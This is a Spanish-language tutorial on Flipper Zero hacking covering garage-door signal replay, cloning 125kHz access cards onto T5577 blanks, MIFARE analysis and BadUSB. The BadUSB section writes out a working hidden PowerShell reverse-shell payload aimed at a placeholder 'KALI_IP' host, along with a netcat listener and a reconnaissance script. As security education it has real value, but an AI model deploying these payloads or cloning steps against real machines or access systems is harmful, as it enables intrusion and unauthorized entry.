The Hacker's Path: Serie de 5 Partes
Parte 1: Introduccion → Parte 2: Dominio del Flipper → Parte 3: Fundamentos de Kali → Parte 4: Explotacion → Parte 5: La Auditoria Completa
En la Parte 1, diste tus primeros pasos. Clonaste algunos controles IR, escaneaste tarjetas NFC, viste el espectro sub-GHz iluminarse y escribiste "Hello World" con BadUSB. Viste que la seguridad es frecuentemente una ilusion.
Ahora vamos a fondo. Al final de este articulo, entenderas cada protocolo principal con el que tu Flipper Zero puede interactuar, no solo como usarlos, sino por que funcionan como lo hacen y que significa eso para la seguridad.
Advertencia justa: Vas a descubrir que varias cosas que asumias como seguras... no lo son.
La Filosofia Flipper
Antes de sumergirnos en los protocolos, establezcamos la mentalidad correcta. El Flipper Zero no es un "dispositivo de hackeo" en el sentido de Hollywood. Es una herramienta de aprendizaje que te permite interactuar con frecuencias de radio y protocolos de hardware que normalmente son invisibles.
Piensalo como una lupa para senales inalambricas. Las senales siempre estuvieron ahi. Solo que no podias verlas. Ahora puedes.
Esta distincion importa porque cambia como abordas la seguridad. La mayoria de la "seguridad" depende de la oscuridad, la suposicion de que los atacantes no sabran como interactuar con un sistema. Tu Flipper elimina esa oscuridad. Te muestra exactamente lo que se transmite y recibe. Y una vez que puedes verlo, puedes evaluar si existe seguridad real.
Spoiler: Frecuentemente, no existe.
⚠️ Recordatorio: Solo Tus Cosas
Todo en este articulo es para probar TUS PROPIOS dispositivos, tarjetas y sistemas. Las tecnicas funcionan en las cosas de cualquiera, ese es el punto. Pero usarlas en sistemas que no posees es ilegal. Prueba tu propia seguridad. Descubre tus propias vulnerabilidades. Ese es el camino.
Sub-GHz: El Espectro Invisible
Las frecuencias de radio sub-gigahertz estan en todas partes. Tu puerta de garaje, llave del auto, estacion meteorologica, timbre inalambrico, sensores de presion de neumaticos, dispositivos de hogar inteligente, todos transmiten constantemente en bandas de frecuencia por debajo de 1 GHz.
¿Por que sub-GHz? Las frecuencias mas bajas viajan mas lejos y penetran paredes mejor que las frecuencias mas altas como WiFi (2.4/5 GHz). Eso las hace perfectas para dispositivos que necesitan comunicacion confiable a distancia sin requerimientos de linea de vision.
El Paisaje de Frecuencias
Diferentes regiones usan diferentes frecuencias debido a regulaciones:
- 315 MHz: Norteamerica: puertas de garaje antiguas, llaves de auto
- 390 MHz: Norteamerica: puertas de garaje, algunos automotrices
- 433.92 MHz: Mundial: estaciones meteorologicas, sensores, dispositivos europeos, muchos productos IoT
- 868 MHz: Europa: hogar inteligente, LoRa, medidores de servicios
- 915 MHz: Americas: LoRa, hogar inteligente, industrial
Con firmware Momentum, tu Flipper puede transmitir y recibir en todas estas bandas sin importar tu ubicacion fisica. El firmware de fabrica te restringe a las frecuencias legales de tu region. Esto importa para el aprendizaje: podrias tener dispositivos operando en frecuencias "extranjeras".
Proyecto: Analiza Tu Puerta de Garaje
Tiempo: 15 minutos
Lo que aprenderas: La diferencia entre codigos estaticos y codigos rodantes, y por que importa
Pasos:
- Navega a Sub-GHz → Read
- Parate cerca de tu garaje (no tan cerca como para que la puerta se abra)
- Presiona el boton de tu control remoto de garaje
- Observa como el Flipper captura la senal
- Examina lo capturado, mira el protocolo identificado
Lo que podrias ver:
- Princeton, Linear, Chamberlain (antiguo): Codigos estaticos. El mismo codigo se transmite cada vez. Vulnerable a ataques de repeticion.
- KeeLoq, Security+ 2.0, Rolling Code: Codigos rodantes. Cada transmision usa un codigo diferente de una secuencia sincronizada. No se puede simplemente repetir.
La realidad: Si tu puerta de garaje usa un codigo estatico (muchas instaladas antes de ~2015 lo hacen), cualquiera que capture esa senal una vez puede repetirla para siempre. Tu garaje esta asegurado por la suposicion de que nadie esta escuchando. Esa suposicion acaba de romperse.
Codigos Rodantes Explicados
Las puertas de garaje modernas y las llaves de auto usan codigos rodantes (tambien llamados codigos saltantes). Asi funcionan:
- Tanto el transmisor (tu control) como el receptor (tu garaje) comparten una semilla secreta y un algoritmo
- Cada presion de boton genera el siguiente codigo en una secuencia sincronizada
- El receptor acepta el codigo actual O cualquiera de los siguientes ~256 codigos (para manejar presiones de boton fuera de rango)
- Una vez que un codigo se usa, se invalida para siempre
Esto significa que capturar y repetir una senal de codigo rodante no funciona: para cuando la repites, el codigo ya esta invalidado.
Por Que Esto Importa
Los codigos rodantes se inventaron porque el mundo sub-GHz descubrio que la seguridad por oscuridad falla. Alguien descubrio como capturar y repetir senales, asi que la industria tuvo que implementar seguridad criptografica real. Este patron se repite en cada protocolo que discutiremos: la seguridad solo se agrega despues de que alguien demuestra la vulnerabilidad.
Proyecto: Captura Datos de Estacion Meteorologica
Tiempo: 10 minutos
Lo que aprenderas: Cuantos datos se transmiten sin ninguna proteccion
Pasos:
- Navega a Sub-GHz → Read
- Espera cerca de cualquier sensor meteorologico inalambrico (termometro exterior, pluviometro, etc.)
- La mayoria transmite cada 30-60 segundos
- Captura la transmision
- Nota el protocolo y cualquier dato decodificado
Lo que encontraras: Temperatura, humedad, estado de bateria, ID del sensor, todo transmitido en texto plano. Sin encriptacion, sin autenticacion. Cualquier receptor sintonizado en esa frecuencia obtiene todos los datos. Ahora piensa en que mas en tu vecindario esta transmitiendo...
RFID: El Mundo de 125kHz
RFID de baja frecuencia (125kHz) es la tecnologia de tarjetas de proximidad mas antigua y simple. La encontraras en tarjetas de gimnasio, tarjetas de acceso de edificios antiguos, estacionamientos y sistemas de entrada de edificios de apartamentos.
Y es casi universalmente terrible para la seguridad.
Como Funciona RFID de 125kHz
Estas tarjetas son pasivas: no tienen bateria. Cuando sostienes una cerca de un lector, el campo electromagnetico del lector alimenta la tarjeta, y la tarjeta transmite su numero de ID. Eso es todo. Sin desafio-respuesta. Sin encriptacion. Solo: "Soy la tarjeta numero 12345."
El lector dice "ok" y otorga acceso basandose unicamente en conocer ese numero de ID.
Ves el problema.
Tipos Comunes de Tarjetas 125kHz
- EM4100: Extremadamente comun. Solo transmite un ID de 40 bits. Cero seguridad.
- HID Prox: La tarjeta de acceso corporativo mas comun. Transmite codigo de instalacion + numero de tarjeta. Cero seguridad.
- Indala: Menos comun. Codificacion diferente pero el mismo problema: sin seguridad.
- AWID: Otra variante. La misma debilidad fundamental.
¿Notas el patron? Todas estas tarjetas simplemente transmiten un ID. La "seguridad" es que alguien necesitaria equipo especializado para leer ese ID. Tu Flipper es ese equipo.
Proyecto: Clona Tu Tarjeta del Gimnasio
Tiempo: 5 minutos
Lo que necesitas: Tu tarjeta de gimnasio/piscina/apartamento de 125kHz, una tarjeta en blanco T5577 ($1-2 cada una)
Pasos:
- Navega a 125 kHz RFID → Read
- Sostene tu tarjeta contra la parte trasera del Flipper (donde esta la antena RFID)
- Espera una lectura exitosa, nota el tipo de tarjeta y el ID
- Guarda la tarjeta con un nombre reconocible
- Para probar la emulacion: Saved → Select Card → Emulate
- Sostene el Flipper contra el lector de tu gimnasio, deberia funcionar identicamente a tu tarjeta
Para escribir en una T5577 en blanco:
- Ve a tu tarjeta guardada
- Selecciona Write
- Sostene una tarjeta T5577 en blanco contra el Flipper
- Espera la confirmacion de escritura
- Ahora tienes un clon fisico
Por que importa: Todo el modelo de seguridad de ese sistema de control de acceso acaba de colapsar. Cualquiera que pueda acercarse a tu tarjeta por dos segundos puede clonarla. Piensa en eso la proxima vez que dejes tu bolsa de gimnasio desatendida en el vestuario.
La T5577: Tu Tarjeta Magica
La T5577 es una tarjeta RFID reescribible que puede emular la mayoria de los tipos de tarjetas de 125kHz. Es como un CD-R en blanco para tarjetas de acceso. Puedes escribir cualquier dato de tarjeta en ella, y se convierte en esa tarjeta.
Compra un paquete de 10 para pruebas. Son baratas e increiblemente utiles para entender lo debil que es toda esta tecnologia. Puedes escribir los datos de una tarjeta, probarla, luego escribir datos de otra tarjeta, todo en la misma tarjeta fisica.
Lo Que Esto Revela
La "seguridad" RFID de 125kHz es puro teatro. Estos sistemas asumen que no puedes leer la tarjeta, no puedes copiar los datos, y no puedes escribirlos en otra tarjeta. Las tres suposiciones son falsas con equipo de consumo. Si tu lugar de trabajo usa tarjetas HID Prox (la tarjeta de acceso corporativo mas comun), cualquier empleado con un Flipper puede clonar la de cualquier otro empleado. Deja que eso cale.
Punto Clave
La seguridad RFID de 125kHz es puro teatro. Estos sistemas asumen que no puedes leer, copiar ni reescribir datos de tarjetas. Las tres suposiciones son falsas con equipo de consumo que cuesta menos de $200.
NFC: El Mundo de 13.56MHz
NFC de alta frecuencia (13.56 MHz) es la generacion mas nueva. Impulsa pagos sin contacto, tarjetas de acceso modernas, sistemas de transito, llaves de hotel y el pago por toque de tu telefono.
La buena noticia: Algunas tarjetas NFC realmente tienen seguridad real.
La mala noticia: Muchas no.
Tipos de Tarjetas NFC
- MIFARE Classic: Extremadamente comun en tarjetas de acceso, transito, hoteles. Usa encriptacion propietaria que fue crackeada hace anos. Vulnerable.
- MIFARE Ultralight: Tarjetas simples con seguridad minima. Frecuentemente usadas para boletos de transito desechables.
- NTAG: Comun en etiquetas NFC para automatizacion. Generalmente seguridad minima.
- MIFARE DESFire: Realmente segura. Usa encriptacion AES. Usada en implementaciones de alta seguridad mas nuevas.
- EMV (Tarjetas de Pago): Tu tarjeta de credito. Tiene encriptacion fuerte, limites de transaccion y deteccion de fraude.
Proyecto: Analiza Tu Tarjeta de Trabajo
Tiempo: 10 minutos
Lo que aprenderas: Si tu lugar de trabajo tiene seguridad real o teatro de seguridad
Pasos:
- Navega a NFC → Read
- Sostene tu tarjeta de trabajo contra la parte trasera del Flipper
- Espera a que la lectura se complete
- Examina lo que el Flipper te dice
Interpretando resultados:
- MIFARE Classic 1K/4K: Tu tarjeta usa encriptacion crackeada. Con tiempo y las herramientas correctas, puede clonarse.
- MIFARE Ultralight: Seguridad minima. Frecuentemente clonable.
- MIFARE DESFire: Realmente segura. Veras datos limitados.
- Unknown/Locked: Podria ser propietaria o DESFire. Se necesita mas investigacion.
Verificacion de realidad: La mayoria de las tarjetas corporativas siguen siendo MIFARE Classic. La encriptacion fue rota publicamente en 2008. Hace dieciocho anos. Si tu tarjeta dice MIFARE Classic, tu empleador esta ejecutando un sistema de seguridad que los criptografos consideran risiblemente roto.
Clonacion de UID vs Clonacion Completa
Distincion importante: El Flipper siempre puede leer y emular el UID (Identificador Unico) de una tarjeta, el numero de serie. Algunos sistemas de acceso solo verifican el UID. Para estos sistemas, la emulacion simple funciona.
Sistemas mejores verifican tanto el UID COMO los datos encriptados almacenados en la tarjeta. Para estos, necesitarias tambien clonar los sectores encriptados, posible para MIFARE Classic (la encriptacion esta rota) pero no para DESFire.
Proyecto: Analisis de Tarjeta de Hotel
Tiempo: 5 minutos (la proxima vez que estes en un hotel)
Lo que aprenderas: Como funciona realmente la seguridad de hoteles
Pasos:
- Lee tu tarjeta de hotel con NFC → Read
- Nota el tipo de tarjeta
- Mira que datos son legibles
Lo que tipicamente encontraras: La mayoria de las llaves de hotel son MIFARE Ultralight o Classic. Algunas muestran numero de habitacion, fecha de checkout u otros metadatos en sectores legibles. La "seguridad" es que los huespedes normalmente no tienen lectores NFC. Tu ahora si.
Tarjetas Magicas para NFC
Como la T5577 para 125kHz, hay tarjetas NFC "magicas" para 13.56MHz:
- Gen1 (UID Modificable): Puede escribir UID personalizado. Detectada por algunos lectores como "magica."
- Gen2 (CUID): Mejor compatibilidad. Los cambios de UID persisten entre ciclos de energia.
- Gen3 (UFUID): Puede bloquear el UID despues de escribir, aparece como tarjeta normal.
- Gen4 (Ultimate Magic): La mas flexible. Puede emular multiples tipos de tarjetas.
Para aprender, las tarjetas Gen2 son el punto ideal: baratas, ampliamente compatibles y suficientemente buenas para la mayoria de las pruebas.
Infrarrojo: Control Completo
Ya creaste controles IR en la Parte 1. Vamos mas profundo.
Construyendo la Biblioteca de Controles Definitiva
El Flipper puede almacenar controles IR ilimitados. Pero aprender cada boton individualmente es tedioso. Mejor enfoque: usa las bases de datos comunitarias.
El firmware Momentum incluye IRDB, una base de datos masiva de controles pre-capturados. Tambien puedes descargar controles de repositorios de GitHub y agregarlos a la tarjeta SD de tu Flipper.
Proyecto: Construye Tu Arsenal IR
Tiempo: 20 minutos
Pasos:
- En tu Flipper: Infrared → Universal Remotes
- Encontraras controles universales pre-construidos para TVs, ACs, proyectores, etc.
- Pruebalos contra tus dispositivos
- Para dispositivos no cubiertos, usa Learn New Remote
- Organiza los controles guardados por habitacion o tipo de dispositivo
Jugada maestra: Crea "controles de habitacion" que combinen todos los dispositivos IR en un solo espacio. Un archivo controla TV, barra de sonido, luces y AC.
Lo que aprendes: IR es universal y sin proteccion. Cualquier dispositivo con receptor IR puede ser controlado por cualquier dispositivo con transmisor IR. Esto es intencional: IR fue disenado para conveniencia, no para seguridad. Tu Flipper simplemente hace esa conveniencia universal.
Captura IR en Bruto
Algunos dispositivos usan protocolos IR no estandar. Para estos, el Flipper puede capturar la senal en bruto, la sincronizacion exacta de pulsos encendido/apagado, y reproducirla perfectamente.
Navega a Infrared → Learn New → Raw cuando el aprendizaje estandar no reconoce una senal.
BadUSB: La Alternativa al Rubber Ducky
En la Parte 1, hiciste que el Flipper escribiera "Hello World." Ahora vamos en serio.
BadUSB (tambien conocido como ataques USB Rubber Ducky) explota una falla fundamental en como las computadoras manejan dispositivos USB: confian implicitamente en los teclados. Cuando conectas un dispositivo que dice ser un teclado, la computadora acepta cada tecla sin cuestionamiento.
Tu Flipper puede escribir aproximadamente 1,000 caracteres por segundo. Mas rapido que cualquier humano. Suficientemente rapido para ejecutar ataques complejos antes de que alguien pueda reaccionar.
Fundamentos de DuckyScript
Los payloads de BadUSB usan DuckyScript, un lenguaje de scripting simple. Comandos clave:
REM This is a comment
DELAY 1000
STRING Hello World
ENTER
GUI r
ALT F4
CTRL c
TAB
DOWNARROW
ESCAPEProyecto: Recolector de Informacion del Sistema
Tiempo: 15 minutos
Que hace: Abre PowerShell, recopila informacion del sistema, guarda en un archivo (en TU maquina)
REM System Info Grabber - Run on YOUR machine only
DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $info = @{
ENTER
STRING Hostname = $env:COMPUTERNAME
ENTER
STRING Username = $env:USERNAME
ENTER
STRING Domain = $env:USERDOMAIN
ENTER
STRING IP = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
ENTER
STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
ENTER
STRING }
ENTER
STRING $info | ConvertTo-Json | Out-File "$env:USERPROFILE\Desktop\sysinfo.json"
ENTER
STRING exit
ENTERLo que aprendes: En menos de 3 segundos de acceso fisico, un atacante podria recopilar nombre de host, nombre de usuario, dominio, direcciones IP y version del SO. Esto es reconocimiento. Imagina que mas podria escribirse en esos 3 segundos.
Proyecto: Configuracion de Shell Reverso
Tiempo: 30 minutos (incluyendo configuracion de Kali)
Que hace: Crea una conexion de vuelta a tu maquina Kali (prepara para la Parte 3)
Prerrequisitos: Kali Linux ejecutandose (VM esta bien), conocer la IP de tu Kali
En Kali - Iniciar listener:
nc -lvnp 4444
Payload BadUSB (objetivo Windows):
REM Reverse Shell - Replace KALI_IP with your Kali's IP
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('KALI_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()"
ENTERLo que sucede: La maquina objetivo abre una conexion PowerShell de vuelta a tu maquina Kali. Ahora tienes acceso por linea de comandos a esa maquina. Este es el nucleo de como acceso fisico + BadUSB = compromiso completo. Exploraremos esto mas en la Parte 3.
⚠️ Estos Payloads Son Reales
El payload de shell reverso de arriba realmente funciona. Usalo SOLO en maquinas que posees para pruebas. Ejecutar esto en la maquina de otra persona es un delito federal (acceso no autorizado + instalacion de puerta trasera). El punto es entender la amenaza, no crear una.
Payloads Divertidos para Demostraciones
Para demostrar BadUSB a otros (en su maquina con permiso), aqui hay algunos payloads inofensivos pero impresionantes:
REM Rick Roll - Opens YouTube
DELAY 1000
GUI r
DELAY 500
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTERREM Fake Windows Update - Fullscreen prank page
DELAY 1000
GUI r
DELAY 500
STRING https://fakeupdate.net/win10ue/
ENTER
DELAY 2000
F11REM Flip Screen Upside Down (Windows)
DELAY 1000
CTRL ALT DOWNARROWGPIO: Expansion de Hardware
Los pines GPIO (Entrada/Salida de Proposito General) del Flipper te permiten conectar modulos externos y expandir capacidades. Aqui es donde el Flipper se transforma de herramienta portatil a plataforma de desarrollo.
Modulos Imprescindibles
- WiFi Dev Board: Agrega capacidades WiFi: captura de paquetes, pruebas de deauth, ataques evil twin. Esencial desde la Parte 3 en adelante.
- Antena Externa CC1101: Extiende dramaticamente el rango Sub-GHz. La antena interna funciona, pero la externa es mejor para trabajo serio.
- ESP32 Marauder: Convierte el Flipper en una plataforma de hackeo WiFi/Bluetooth. Captura handshakes, ejecuta ataques.
- ProtoBoard: Para proyectos personalizados y conectar tu propio hardware.
Proyecto: Configuracion del WiFi Dev Board
Tiempo: 20 minutos
Lo que necesitas: WiFi Dev Board (ESP32 oficial o compatible)
Pasos:
- Flashea firmware Marauder al ESP32 (instrucciones en github.com/justcallmekoko/ESP32Marauder)
- Conecta a los pines GPIO del Flipper
- Navega a GPIO → ESP32 → Marauder
- Ahora tienes escaneo WiFi, deauth y captura de paquetes
Por que importa: El Flipper solo no puede hacer WiFi: carece del hardware de radio correcto. Pero con el dev board, puedes escanear redes, capturar handshakes WPA y realizar ataques WiFi. Usaremos esto extensamente en las Partes 3 y 4.
Caracteristicas Avanzadas de Momentum
Si estas ejecutando firmware Momentum (deberias estarlo), aqui hay caracteristicas que vale la pena explorar:
- Animaciones de Escritorio: Puramente cosmeticas, pero divertidas. Revisa los paquetes de animaciones de la comunidad.
- Protocolos Extendidos: Momentum agrega soporte para protocolos que el firmware de fabrica no incluye.
- Hub de Aplicaciones: Apps adicionales mas alla de las de fabrica: juegos, herramientas, utilidades especializadas.
- Paquetes de Assets Personalizados: Cambia toda la apariencia y sensacion.
El valor real esta en las frecuencias desbloqueadas y el soporte extendido de protocolos. El firmware de fabrica esta intencionalmente limitado por cumplimiento legal/regulatorio. Momentum asume que eres un adulto que entiende las reglas.
Lo Que Has Dominado
Ahora entiendes:
- Sub-GHz: Como se comunican puertas de garaje, llaves de auto y sensores, y por que importan los codigos rodantes
- RFID de 125kHz: Por que las tarjetas de gimnasio y tarjetas de acceso antiguas son trivialmente clonables
- NFC de 13.56MHz: La diferencia entre encriptacion rota (MIFARE Classic) y seguridad real (DESFire)
- Infrarrojo: Como construir una biblioteca de controles universales y capturar senales en bruto
- BadUSB: Por que la confianza HID USB es una vulnerabilidad fundamental, y como explotarla
- GPIO: Como expandir hacia WiFi, rango extendido y hardware personalizado
Tu Flipper es ahora un arma. Pero es un destornillador comparado con Kali Linux, que es un taller entero. Es hora de arrancar el verdadero entorno de hackeo.
The Hacker's Path
Una serie de 5 partes que te lleva de curioso a capaz.
Parte 1: Introduccion Parte 2: Dominio del Flipper ✓ Parte 3: Fundamentos de Kali Parte 4: Explotacion Parte 5: Auditoria Completa
Checklist de la Parte 2
☐ Sub-GHz: Puerta de garaje analizada, codigos rodantes vs estaticos entendidos
☐ RFID de 125kHz: Tarjetas leidas, al menos un clon probado
☐ NFC: Tarjeta de trabajo analizada, tipo de tarjeta identificado
☐ Infrarrojo: Biblioteca completa de controles del hogar construida
☐ BadUSB: Payload de info del sistema probado, shell reverso entendido
☐ GPIO: WiFi dev board listo para la Parte 3
☐ Tarjetas Magicas: T5577 y/o tarjetas magicas NFC adquiridas para pruebas
Que Sigue
En la Parte 3, dejamos las capacidades enfocadas del Flipper y entramos al entorno completo de pruebas de penetracion: Kali Linux.
Aprenderas:
- Configurar tu laboratorio de hackeo (instalacion y configuracion de VM)
- Reconocimiento de red con nmap: mapear cada dispositivo en tu red
- Reconocimiento inalambrico: capturar handshakes WiFi con aircrack-ng
- Reconocimiento web: descubrir que expone tu router
- Conectar capturas del Flipper con flujos de trabajo de Kali
El Flipper te mostro que existen vulnerabilidades. Kali te ayuda a entender exactamente que tan profundas son.
Nos vemos en la Parte 3.